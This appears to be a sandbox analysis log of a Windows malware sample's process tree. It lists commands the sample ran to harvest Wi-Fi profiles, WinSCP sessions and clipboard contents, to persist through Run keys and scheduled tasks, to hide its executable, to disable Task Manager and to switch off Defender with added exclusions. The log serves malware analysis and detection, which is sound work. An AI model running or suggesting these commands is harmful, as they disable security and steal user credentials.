      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"

  PID 2352  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""

    PID 2752  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"

  PID 4636  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""

    PID 2692  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"

  PID 2412  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}""

    PID 4368  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}"

  PID 4464  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}""

    PID 808  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}"

  PID 2868  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}""

    PID 3144  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}"

  PID 2372  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""

    PID 3432  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"

  PID 1792  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""

    PID 3920  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"

  PID 3256  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""

    PID 3312  C:\Windows\system32\reg.exe
      cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}""2⤵PID:4620
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}"3⤵PID:3220
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}""2⤵PID:1900
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}"3⤵PID:64
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}""2⤵PID:2616
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}"3⤵PID:4924
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""2⤵PID:4824
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"3⤵PID:4288
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}""2⤵PID:2552
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}"3⤵PID:4184
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""2⤵PID:2356
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"3⤵PID:1560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}""2⤵PID:1380
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}"3⤵PID:3504
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}""2⤵PID:2920
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}"3⤵PID:3356
-
-
-
  C:\Windows\system32\cmd.exe (PID 1608)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\rjPePv20tUXH_tezmp.ps1""
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4828)
      cmdline: powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\rjPePv20tUXH_tezmp.ps1"
      - Command and Scripting Interpreter: PowerShell

  C:\Windows\system32\cmd.exe (PID 2752)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "mullvad account get"

  C:\Windows\system32\cmd.exe (PID 3100)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -command "function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace "root\\SecurityCenter2" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { "262144" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "262160" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "266240" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "266256" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "393216" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "393232" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "393488" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "397312" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "397328" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "397584" { $defstatus = "Out of date"; $rtstatus = "Enabled" } default { $defstatus = "Unknown"; $rtstatus = "Unknown" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct ""
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1284)
      cmdline: powershell -command "function Get-AntiVirusProduct {
      - Command and Scripting Interpreter: PowerShell

  C:\Windows\system32\cmd.exe (PID 2700)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1512)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 2692)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"
    C:\Windows\system32\netsh.exe (PID 3048)
      cmdline: netsh wlan show profile

  C:\Windows\system32\cmd.exe (PID 2964)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""
    C:\Windows\system32\reg.exe (PID 4820)
      cmdline: C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"

  C:\Windows\system32\cmd.exe (PID 1344)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupqfB3Eu /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe /f"
    C:\Windows\system32\reg.exe (PID 4244)
      cmdline: C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupqfB3Eu /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe /f
      - Adds Run key to start application

  C:\Windows\system32\cmd.exe (PID 4444)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupqfB3Eu /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe\" /F /rl highest"
    C:\Windows\system32\cmd.exe (PID 2056)
      cmdline: cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupqfB3Eu /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe\" /F /rl highest
      C:\Windows\system32\schtasks.exe (PID 2232)
        cmdline: schtasks /create /sc onlogon /tn WindowsDriverSetupqfB3Eu /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe\" /F /rl highest
        - Creates scheduled task(s)

  C:\Windows\system32\cmd.exe (PID 2660)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe\"""
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 496)
      cmdline: powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe\""
      - Command and Scripting Interpreter: PowerShell
      C:\Windows\system32\attrib.exe (PID 2964)
        cmdline: "C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe
        - Views/modifies file attributes

  C:\Windows\system32\cmd.exe (PID 5088)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\feather.exe' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask ""
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4704)
      cmdline: powershell -command "
      - Command and Scripting Interpreter: PowerShell

  C:\Windows\system32\cmd.exe (PID 4804)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f"
    C:\Windows\system32\reg.exe (PID 4864)
      cmdline: C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f

  C:\Windows\system32\cmd.exe (PID 668)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "cscript C:\Users\Admin\AppData\Roaming\J8MYoXP5tVFg.vbs"
    C:\Windows\system32\cscript.exe (PID 2016)
      cmdline: cscript C:\Users\Admin\AppData\Roaming\J8MYoXP5tVFg.vbs

  C:\Windows\system32\cmd.exe (PID 2340)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 808)
      cmdline: powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2552)
      cmdline: powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
      - Command and Scripting Interpreter: PowerShell
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2296)
      cmdline: powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
      - Command and Scripting Interpreter: PowerShell
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4644)
      cmdline: powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"
      - Command and Scripting Interpreter: PowerShell

  C:\Windows\system32\cmd.exe (PID 4388)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salut3zQO7.ps1" -RunAsAdministrator"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3312)
      cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salut3zQO7.ps1" -RunAsAdministrator
      - Command and Scripting Interpreter: PowerShell

  C:\Windows\system32\cmd.exe (PID 864)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe""
    C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe (PID 4876)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of FindShellTrayWindow
  C:\Windows\system32\cmd.exe (PID 4764)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4872)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 432)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1676)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 2660)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4244)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 4836)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4804)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 4316)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1216)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 1208)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3848)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 2948)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2044)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 2388)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2300)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 1700)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2984)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 4076)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 956)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 3192)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4604)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 2952)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4632)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 3608)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 32)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 4980)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2412)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 3440)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3560)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 4912)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\Conhost.exe (PID 3848)
      cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 516)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 1344)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1116)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 5100)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4712)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 1464)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3212)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 1480)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3008)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 4964)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4144)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 4836)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\Conhost.exe (PID 2388)
      cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3152)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 3324)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3032)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 396)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3528)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 4880)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4788)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 4996)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\Conhost.exe (PID 4804)
      cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4964)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 392)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1624)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 1380)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3608)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 3136)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\Conhost.exe (PID 3192)
      cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1824)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 3440)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\Conhost.exe (PID 1480)
      cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2044)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 1520)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4232)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 1216)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\Conhost.exe (PID 4836)
      cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 612)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 1464)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3324)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 2868)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4360)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 2044)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3256)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 2556)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 32)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 1700)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2856)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 2524)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\Conhost.exe (PID 4604)
      cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4400)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 3792)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2868)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 2296)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2044)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 3412)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2556)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 5100)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 5116)
      cmdline: powershell Get-Clipboard

  C:\Windows\system32\cmd.exe (PID 2972)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    C:\Windows\System32\Conhost.exe (PID 4712)
      cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4144)
      cmdline: powershell Get-Clipboard

